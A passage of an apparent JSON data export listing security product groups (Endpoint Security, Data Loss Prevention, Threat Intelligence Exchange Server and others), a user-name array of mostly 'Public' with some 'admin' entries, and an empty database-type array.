Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"McAfee Client Proxy\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"New Group\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"New Group\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\"\\r\\n\\t\\t]\"",
    "userName": "\"[\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\"\\r\\n\\t\\t]\"",
    "databaseType": "\"[\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",